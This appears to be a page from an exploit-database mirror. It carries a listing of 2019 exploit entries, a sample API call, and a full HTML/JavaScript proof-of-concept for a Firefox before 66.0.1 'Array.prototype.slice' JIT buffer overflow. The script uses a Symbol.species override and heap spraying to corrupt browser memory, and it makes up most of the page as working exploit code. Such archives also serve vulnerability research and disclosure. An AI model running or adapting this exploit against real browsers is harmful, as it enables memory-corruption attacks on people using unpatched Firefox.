Menu

Improved exploit search engine. Try it out

"Firefox < 66.0.1 - 'Array.prototype.slice' Buffer Overflow"

Author

xuechiyaobai

Platform

multiple

Release date

2019-03-26

Release Date Title Type Platform Author
2019-06-18 "Sahi pro 8.x - Cross-Site Scripting" webapps multiple "Goutham Madhwaraj"
2019-06-18 "Sahi pro 8.x - SQL Injection" webapps multiple "Goutham Madhwaraj"
2019-06-18 "Sahi pro 7.x/8.x - Directory Traversal" webapps multiple "Goutham Madhwaraj"
2019-06-17 "RedwoodHQ 2.5.5 - Authentication Bypass" webapps multiple EthicalHCOP
2019-06-17 "Thunderbird ESR < 60.7.XXX - 'icalrecur_add_bydayrules' Stack-Based Buffer Overflow" dos multiple "X41 D-Sec GmbH"
2019-06-17 "Thunderbird ESR < 60.7.XXX - 'parser_get_next_char' Heap-Based Buffer Overflow" dos multiple "X41 D-Sec GmbH"
2019-06-17 "Thunderbird ESR < 60.7.XXX - 'icalmemorystrdupanddequote' Heap-Based Buffer Overflow" dos multiple "X41 D-Sec GmbH"
2019-06-17 "Thunderbird ESR < 60.7.XXX - Type Confusion" dos multiple "X41 D-Sec GmbH"
2019-06-05 "Google Chrome 73.0.3683.103 - 'WasmMemoryObject::Grow' Use-After-Free" dos multiple "Google Security Research"
2019-05-28 "Phraseanet < 4.0.7 - Cross-Site Scripting" webapps multiple "Krzysztof Szulski"
2019-05-27 "Deltek Maconomy 2.2.5 - Local File Inclusion" webapps multiple JameelNabbo
2019-05-29 "Spidermonkey - IonMonkey Unexpected ObjectGroup in ObjectGroupDispatch Operation" dos multiple "Google Security Research"
2019-05-29 "Spidermonkey - IonMonkey Leaks JS_OPTIMIZED_OUT Magic Value to Script" dos multiple "Google Security Research"
2019-05-22 "Zoho ManageEngine ServiceDesk Plus 9.3 - Cross-Site Scripting" webapps multiple Vingroup
2019-05-22 "Zoho ManageEngine ServiceDesk Plus < 10.5 - Improper Access Restrictions" webapps multiple Vingroup
2019-05-21 "Apple macOS < 10.14.5 / iOS < 12.3 XNU - 'in6_pcbdetach' Stale Pointer Use-After-Free" dos multiple "Google Security Research"
2019-05-21 "Apple macOS < 10.14.5 / iOS < 12.3 XNU - Wild-read due to bad cast in stf_ioctl" dos multiple "Google Security Research"
2019-05-21 "Apple macOS < 10.14.5 / iOS < 12.3 JavaScriptCore - AIR Optimization Incorrectly Removes Assignment to Register" dos multiple "Google Security Research"
2019-05-21 "Apple macOS < 10.14.5 / iOS < 12.3 JavaScriptCore - Loop-Invariant Code Motion (LICM) in DFG JIT Leaves Stack Variable Uninitialized" dos multiple "Google Security Research"
2019-05-21 "Apple macOS < 10.14.5 / iOS < 12.3 DFG JIT Compiler - 'HasIndexedProperty' Use-After-Free" dos multiple "Google Security Research"
2019-05-21 "Deluge 1.3.15 - 'URL' Denial of Service (PoC)" dos multiple "Victor Mondragón"
2019-05-13 "Google Chrome V8 - Turbofan JSCallReducer::ReduceArrayIndexOfIncludes Out-of-Bounds Read/Write" dos multiple "Google Security Research"
2019-05-10 "CyberArk Enterprise Password Vault 10.7 - XML External Entity Injection" webapps multiple "Marcelo Toran"
2019-05-10 "TheHive Project Cortex < 1.15.2 - Server-Side Request Forgery" webapps multiple "Alexandre Basquin"
2019-05-07 "Prinect Archive System 2015 Release 2.6 - Cross-Site Scripting" webapps multiple alt3kx
2019-05-08 "Oracle Weblogic Server - 'AsyncResponseService' Deserialization Remote Code Execution (Metasploit)" remote multiple Metasploit
2019-05-08 "PostgreSQL 9.3 - COPY FROM PROGRAM Command Execution (Metasploit)" remote multiple Metasploit
2019-05-06 "ReadyAPI 2.5.0 / 2.6.0 - Remote Code Execution" webapps multiple "Gilson Camelo"
2019-05-03 "Zotonic < 0.47.0 mod_admin - Cross-Site Scripting" webapps multiple "Ramòn Janssen"
2019-04-30 "Domoticz 4.10577 - Unauthenticated Remote Command Execution" webapps multiple "Fabio Carretto"
Release Date Title Type Platform Author
2019-03-26 "Firefox < 66.0.1 - 'Array.prototype.slice' Buffer Overflow" dos multiple xuechiyaobai
import requests
response = requests.get('https://www.nmmapper.com/api/exploitdetails/46605/?format=json')
                                                {"url": "https://www.nmmapper.com/api/exploitdetails/46605/?format=json", "download_file": "https://www.nmmapper.com/st/exploitdetails/46605/41052/firefox-6601-arrayprototypeslice-buffer-overflow/download/", "exploit_id": "46605", "exploit_description": "\"Firefox < 66.0.1 - 'Array.prototype.slice' Buffer Overflow\"", "exploit_date": "2019-03-26", "exploit_author": "xuechiyaobai", "exploit_type": "dos", "exploit_platform": "multiple", "exploit_port": null}
                                            

For full documentation follow the link above

Browse exploit DB API Browse

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
<script>

let size = 64;

garr = [];
j = 0;
function gc(){
	var tmp = [];
	for(let i = 0;i < 0x20000;i++){
		tmp[i] = new Uint32Array(size * 2);
		for(let j = 0;j < (size*2);j+=2){
			tmp[i][j] = 0x12345678;
			tmp[i][j+1] = 0xfffe0123;
		}
	}
	garr[j++] = tmp;
}

let arr = [{},2.2];

let obj = {};

obj[Symbol.species] = function(){
	victim.length = 0x0;
	for(let i = 0;i < 0x2000;i++){
		gvictim[i].length = 0x0;
		gvictim[i] = null;
	}
	gc();
	//Array.isArray(garr[0][0x10000]);
	return [1.1];
}

let gvictim = [];

for(let i = 0;i < 0x1000;i++){
	gvictim[i] = [1.1,2.2];
	gvictim[i].length = size;
	gvictim[i].fill(3.3);
}

let victim = [1.1,2.2];
victim.length = size;
victim.fill(3.3);

for(let i = 0x1000;i < 0x2000;i++){
	gvictim[i] = [1.1,2.2];
	gvictim[i].length = size;
	gvictim[i].fill(3.3);
}

function fake(arg){
}
for(let i = 0;i < size;i++){
	fake["x"+i.toString()] = 2.2;
}

function jit(){
	victim[1] = 1.1;
	arr.slice();
	//fake.x2 = 6.17651672645e-312;
	return victim[2];
}

flag = 0;


for(let i = 0;i < 0x10000;i++){
	xx = jit();
}

arr.constructor = obj;

Array.isArray(victim);
alert(333);
alert(jit());
</script>